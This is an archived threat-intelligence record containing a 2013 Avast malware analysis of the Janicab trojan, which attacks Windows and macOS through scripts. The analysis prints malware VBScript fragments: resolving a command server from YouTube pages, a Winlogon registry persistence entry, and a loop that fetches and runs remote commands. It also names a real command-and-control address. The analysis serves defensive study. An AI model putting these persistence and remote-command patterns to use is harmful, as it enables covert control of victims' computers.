{
	"id": "6691ed19-44de-416f-bb23-0b091035c73e",
	"created_at": "2026-04-06T00:06:07.847724Z",
	"updated_at": "2026-04-10T03:24:18.222432Z",
	"deleted_at": null,
	"sha1_hash": "9edab33dbc5a2e6710a911dc1fb6e8d53d17a6e4",
	"title": "Multisystem Trojan Janicab attacks Windows and MacOSX via scripts",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 188799,
	"plain_text": "Multisystem Trojan Janicab attacks Windows and MacOSX via scripts\r\nBy Threat Intelligence Team 23 Jul 2013\r\nArchived: 2026-04-05 18:25:03 UTC\r\nOn Friday, July 12th, a warning from an AVAST fan about a new polymorphic multisystem threat arrived in an AVAST inbox, with an archive of the malicious files discussed here attached. Some of them had been uploaded to VirusTotal and were therefore shared with computer security professionals the same day.\r\nOver the weekend, articles full of excitement about a new Trojan for MacOS started to appear on the web. We decided to make a thorough analysis rather than quickly jump on the bandwagon. The key observation is that the final payload comes in the form of scripts that need to be interpreted by Windows Script Console on Windows and by Python on MacOS. Moreover, a script generator that creates new malicious Windows file shortcuts was also included.\r\nWindows version\r\nA chain of events that installs a malicious Visual Basic script on the Windows platform looks like this:\r\nThe chain begins with a malicious Office Open XML document containing two embedded binary files. One of them is called ActiveX.bin and carries the main shellcode, which is triggered by the widely spread exploit CVE-2012-0158 (under special settings, ActiveX controls in MSCOMCTL.OCX trigger code execution). The shellcode first decrypts itself with an initial loop that uses 0xEE as a one-byte key. Then a few API functions needed for dropping another file are resolved by hash (VirtualAlloc, CreateFile, ReadFile, WriteFile, GetTempPath, CloseHandle). 
In the figure we can see a check for the magic value 0xB19B00B5 (the shellcode performs this step twice, because a generic memory search could return the address of its own code instead of the location in the data). A temporary file \"a.l\" is created.\r\nhttps://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/\r\nPage 1 of 6\n\nThe next stage is decrypted from the second embedded binary, named ActiveX1.bin. It is loaded into a buffer pointed to by the edi register. Two bytes and one double word are extracted and immediately used in a decryption routine (a one-byte XOR whose key is changed by a constant in every iteration). A dynamic link library is dropped and loaded.\r\nThe dropper simply loads and executes two unencrypted files from its resources. The first is a benign Word document whose purpose is to avoid raising suspicion when the document is opened. The second is a malicious Visual Basic script, \"1.vbe\", encoded with the Windows Script Encoder screnc.exe. This script is the final payload of the chain and is tagged with the version number \"1.0.4\".\r\nDepending on the system version, the malware looks for an installed antivirus product via Windows Management Instrumentation (WMI), executing the query \"Select displayName from AntiVirusProduct\" on the WMI object \"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter2\". It stores the result in the variable installedAV. 
Then it randomly chooses a youtube.com link from a hard-coded list and evaluates a regular expression on the received content:\r\nrandLink = YouTubeLinks(Int((max-min+1)*Rnd+min))\r\noutputHTML = getPage(randLink, 60)\r\nSet objRE = New RegExp\r\nWith objRE\r\n.Pattern = \"just something i made up for fun, check out my website at (.*) bye bye\"\r\n.IgnoreCase = True\r\nEnd With\r\nSet objMatch = objRE.Execute( outputHTML )\r\nIf objMatch.Count = 1 Then\r\nserver = \"http://\" \u0026 objMatch.Item(0).Submatches(0)\r\nEnd If\r\nIf getPage(server \u0026 \"/Status.php\", 30) = \"OK\" Then\r\nserverExists = 1\r\nEnd If\r\nSearching for the pattern in cached YouTube pages on the web showed that the expression \"111.90.152.210/cc\" could have been returned as the C\u0026C server address.\r\nPersistence on the infected system is decided by the C\u0026C:\r\nstartupMethod = getPage(server \u0026 \"/sMethod.php?av=\" \u0026 installedAV, 60)\r\nIf it returns the keyword \"reg\" as the startup method, then a registry file containing the lines\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]\r\n\"Shell\"=\"wscript.exe \\\"%userprofile%\\\\SystemFolder\\\\.vbe\\\"\"\r\nwill be imported.\r\nSpying functionality is not present in this variant. 
The main malicious action is a loop that constantly awaits commands from the C\u0026C and executes them on the victim's computer (getPage creates an \"InternetExplorer.Application\" object and returns the HTML content of the given address):\r\nWhile 1\r\nOn Error Resume Next\r\ncommandData = getPage(server \u0026 \"/gcm.php?sn=\" \u0026 Serial, 30)\r\nIf Not IsNull(commandData) And commandData <> \"\" Then\r\ns.Run \"cmd /c \" \u0026 c, 0\r\nEnd If\r\nWScript.Sleep 60000\r\nWend\r\nMacOSX version\r\nAs mentioned in the introduction, the variant for MacOS uses compiled Python scripts, and it is described elsewhere with a lot of relevant screenshots (another reference is here). It uses the right-to-left override trick to confuse the user about what is being executed (the Windows malware uses similar masking). The internal version number is \"3.0.6\", so it has probably been in development longer.\r\nSpying activities consist of recording audio with the command-line tool \"Sound eXchange\" and taking screenshots triggered by mouse actions (handled by the freely distributed command-line tool mt, short for MouseTools):\r\nFor comparison with the Windows version, observe that the C\u0026C server is obtained in a very similar way:\r\nPersistence is achieved by adding the initial malicious script \"runner.pyc\" to cron:\r\nScript Builder\r\nA simple PHP script is available that creates an archive containing a file shortcut; the shortcut runs a script derived from a given template and displays any desired distracting image. By default, the template is the Windows version of Janicab. 
Even though the methods of generating new samples seem basic, it is interesting to see malware coming as a whole package, as it does in this case.\r\nSources\r\nFinally, the MD5 hashes of some selected samples with the detections of the avast! engine are provided. Detection of the samples connected with the Windows version is very low across AV products.\r\nAcknowledgment\r\nSincere gratitude goes to my colleague Jaromír Hořejší for cooperation on this analysis.\r\nSource: https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/"
	],
	"report_names": [
		"multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433967,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9edab33dbc5a2e6710a911dc1fb6e8d53d17a6e4.pdf",
		"text": "https://archive.orkl.eu/9edab33dbc5a2e6710a911dc1fb6e8d53d17a6e4.txt",
		"img": "https://archive.orkl.eu/9edab33dbc5a2e6710a911dc1fb6e8d53d17a6e4.jpg"
	}
}